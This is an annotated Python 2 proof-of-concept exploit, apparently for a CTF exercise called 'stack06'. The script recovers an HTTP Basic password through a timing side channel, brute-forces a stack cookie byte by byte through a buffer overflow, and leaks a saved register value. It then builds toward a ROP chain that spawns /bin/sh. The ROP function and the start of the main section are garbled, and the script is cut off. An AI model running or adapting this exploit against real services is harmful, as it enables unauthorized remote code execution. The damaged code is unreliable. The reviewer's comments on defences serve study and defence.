#!/usr/bin/python
# Proof-of-concept against the "stack06" training service (a CTF-style
# exercise).  Read as a case study, it chains three server-side weaknesses,
# each of which has a well-known mitigation:
#   1. check_password()/find_next_char(): the service answers faster for a
#      wrong password than for a right prefix (the script accepts a character
#      when the round trip is under 1 ms), so the password is recovered one
#      character at a time.  Defence: constant-time comparison of the whole
#      secret, independent of where the first mismatch is.
#   2. find_cookie(): an over-long password runs into what the script calls
#      the cookie, and the service's "smashing" error text reveals whether a
#      guessed byte was right, so the value is brute-forced byte by byte (at
#      most 4*256 tries instead of 2^32).  This only works if the cookie is the
#      same on every connection -- presumably a forking server that never
#      re-randomizes -- and if the failure is distinguishable to the client.
#   3. find_ebx(): a longer overwrite, compared against a baseline response,
#      leaks a saved register value byte by byte in the same way; presumably
#      used to locate code for the final stage (that stage is not readable in
#      this copy, see get_rop below).
# The file is Python 2 (print statements, xrange, str.encode("hex")).  The
# copy reviewed here was flattened onto two physical lines and partly damaged
# in extraction; the damaged spans are kept verbatim and marked, not guessed.
import struct
import os,sys
import socket
import random
import string
import telnetlib
import time
import base64

# Setup -- target address comes from the command line.  `fd` is not used by
# any function visible in this copy; if it is used at all it is in the
# truncated tail.
ip=sys.argv[1]
port=int(sys.argv[2])
fd=int(sys.argv[3])

def get_connection(ip,port):
    """Open and return a fresh TCP socket connected to (ip, port).

    Every probe below uses its own connection; the caller owns the socket and
    is responsible for closing it.
    """
    s=socket.socket()
    s.connect((ip,port))
    return s

def check_password(s, password):
    """Send one HTTP/1.0 request with Basic auth "stack06:<password>" on `s`.

    Returns (auth, resp): `auth` is True when the literal "Unauthorized" does
    not occur in the response text, `resp` is the raw text received.

    Note: a single recv(1024) is used (the loop that would read until the end
    of the headers is commented out), so `resp` may be a partial response and
    `auth` is only as reliable as that first chunk.  Likewise send() is not
    guaranteed to write the whole request; for a request this small it
    normally does.
    """
    req = "GET / HTTP/1.0\r\nAuthorization: Basic %s\r\n\r\n" % base64.b64encode("stack06:"+password)
    s.send(req)
    resp = ""
    # while not resp.endswith("\r\n\r\n"):
    # resp = s.recv(1024)
    resp = resp + s.recv(1024)
    # print "[*] Received: ", repr(resp)
    auth = "Unauthorized" not in resp
    # print "[*] Returning ", auth
    return (auth, resp)

# First find auth password
def find_next_char(password):
    """Try to extend `password` (a known-good prefix) by one character.

    For each candidate in ascii_letters+digits a new connection is opened and
    the round-trip time of check_password() is measured.  A candidate is
    accepted when authentication succeeded outright, or when the reply came
    back in under 1 ms -- the timing side channel the whole password stage
    rests on.  Only letters and digits are tried, so a password containing
    anything else cannot be found this way.

    Returns (found, new_password): `found` mirrors the auth flag for the
    accepted candidate; if no candidate qualified, (False, password) is
    returned with the prefix unchanged.
    """
    done = False  # unused
    for current_char in string.ascii_letters+string.digits:
        s = get_connection(ip,port)
        t0 = time.time()
        found,resp = check_password(s, password+current_char)
        t1 = time.time()
        # print "Time diff: ", (t1-t0)
        #IF found or time indicates current char is good...
        s.close()
        # 1 ms threshold is a fixed guess tuned for a local target; on a
        # slower link it would never trigger and the password stage would
        # rely on the auth flag alone.
        if found or (t1-t0) < 0.001:
            print "[*] Found character %d = %s" %(len(password)+1,current_char)
            return (found,password+current_char)
    # print "[*] Could not find password, aborting :("
    # sys.exit(0)
    return (False,password)

def find_password():
    """Recover the password character by character, up to 16 characters.

    Stops as soon as a probe authenticates or the 16-character cap is hit.
    NOTE(review): when find_next_char() finds no candidate it returns the
    prefix unchanged, so `len(password)` does not grow and this loop never
    terminates; there is no retry limit.
    """
    password = ""
    found = False
    while(not found) and len(password)<16:
        (found,password) = find_next_char(password)
        # s.close()
    return password

def find_cookie(password,cookie = ""):
    """Brute-force a 4-byte value placed right after 2024 filler bytes.

    `cookie` may carry already-known leading bytes.  For every remaining byte
    all 256 candidates are sent in turn; a candidate is accepted as soon as
    the reply does *not* contain "smashing" (the failure text that would
    otherwise be echoed), which is the oracle that makes a byte-at-a-time
    search possible.  Returns the 4 raw bytes in the order they sit in memory.

    Notes (visible in the code):
      * s.close() sits after the if/else, so on the accepting path the
        `break` skips it and that socket is left open.
      * if all 256 candidates fail for a byte, the outer `while` simply
        starts the same byte over -- there is no give-up condition.
    """
    while len(cookie)!=4:
        for i in xrange(256):
            # print "[*] Test ", i
            s = get_connection(ip,port)
            found,resp = check_password(s,password + "A"*2024+ cookie + chr(i))
            if "smashing" not in resp:
                # print resp
                cookie = cookie + chr(i)
                print "[*] Cookie value is 0x%s" % cookie.encode("hex")
                break
            else:
                print resp
            s.close()
    return cookie

def find_ebx(password,cookie):
    """Leak a 4-byte value located 12 bytes beyond the cookie, byte by byte.

    First records a baseline response for a payload whose 12 trailing bytes
    are all "A".  Then, for each byte position, sends the baseline payload
    plus the bytes leaked so far plus one candidate byte, and accepts the
    candidate whose response is byte-identical to the baseline.  socket.error
    during a probe is swallowed and counted as a miss; when the last candidate
    (255) is reached without a match the script exits with status -1.

    Returns the 4 leaked bytes in memory order; the progress message prints
    them reversed, so the hex shown is the value read LSB-first.
    """
    ebx = "" #\x18"
    s = get_connection(ip,port)
    found,base_resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3)
    s.close()
    while len(ebx)<4:
        for i in xrange(0,256):
            try:
                s = get_connection(ip,port)
                found,resp = check_password(s,password + 
                "A"*2024+ cookie + "AAAA"*3 + ebx + chr(i) )
                s.close()
                if resp == base_resp:
                    ebx = ebx + chr(i)
                    print "[*] ebx value is 0x%s" % ebx[::-1].encode("hex")
                    break
            except socket.error:
                # print "[*] Fail"
                # A connection that failed is not closed here; the socket is
                # simply dropped.
                pass
            # Reached only when candidate 255 did not match (a match breaks
            # out of the loop before this point).
            if i==255:
                print "[*] Could not discover ebx value. Exploit failed."
                sys.exit(-1)
    return ebx

def get_telnetlib(s):
    """Wrap an already-connected socket in a telnetlib.Telnet for interaction."""
    t = telnetlib.Telnet()
    t.sock = s
    return t

def get_rop(libc):
    # execve /bin/sh generated by RopGadget v3.3
    # NOTE(review): the body below is damaged in this copy -- everything
    # between each `struct.pack("` and the following `>` was lost in
    # extraction, which took the format strings, the packed values, the
    # function's end and the opening of the main section with it.  Kept
    # verbatim; nothing here can be reconstructed from the page.
    p = struct.pack(" will hold /bin p += struct.pack(" hold //sh p += struct.pack(" goes to ecx p += struct.pack(" we put a null there p += struct.pack(" this goes to ebx, which points to str p += struct.pack(" /bin/sh into ebx! ROPGadget generated a wrong payload here! p += struct.pack(" 4:

# Main.  Each secret can be supplied on the command line (argv[4] password,
# argv[5] cookie as hex, argv[6] ebx as hex) to skip its discovery step.  The
# condition that introduces the first branch is missing from this copy;
# by analogy with the two that follow it was presumably `if len(sys.argv)>4:`.
    password = sys.argv[4]
    print "[*] Using user supplied password, ", password
else:
    print "[*] Using timing attack to discover password "
    password = find_password()
    print "[*] Found password: ", password
if len(sys.argv)>5:
    cookie = sys.argv[5].decode("hex")
    print "[*] Using user supplied cookie: " , sys.argv[5]
else:
    print "[*] Discovering cookie"
    cookie = find_cookie(password)
if len(sys.argv)>6:
    # Reversed so the user can pass the value as printed by find_ebx().
    ebx = sys.argv[6].decode("hex")[::-1]
    print "[*] Using ebx = 0x%s" % sys.argv[6]
else:
    # ebx = "\x18" # This is the LSB of the original ebx
    print "[*] Attempting leak of ebx"
    ebx = find_ebx(password,cookie)
# NOTE(review): the script is truncated here; the remainder (the unpack of
# the leaked value and everything after it) is not in this copy.
base = struct.unpack("